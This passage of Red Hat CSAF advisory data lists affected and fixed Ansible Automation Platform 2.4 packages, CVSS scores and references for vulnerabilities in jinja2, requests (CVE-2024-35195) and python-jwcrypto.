"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: accepts keys containing non-attribute characters"
},
{
"cve": "CVE-2024-35195",
"cwe": {
"id": "CWE-670",
"name": "Always-Incorrect Control Flow Implementation"
},
"discovery_date": "2024-05-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2282114"
}
],
"notes": [
{
"category": "description",
"text": "An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "requests: subsequent requests to the same host ignore cert verification",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-35195"
},
{
"category": "external",
"summary": "RHBZ#2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
},
{
"category": "external",
"summary": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
}
],
"release_date": "2024-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "requests: subsequent requests to the same host ignore cert verification"
}
]
}
RHSA-2024_2559
Vulnerability from csaf_redhat - Published: 2024-04-30 13:36 - Updated: 2024-11-24 15:20An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.
{
"document": {
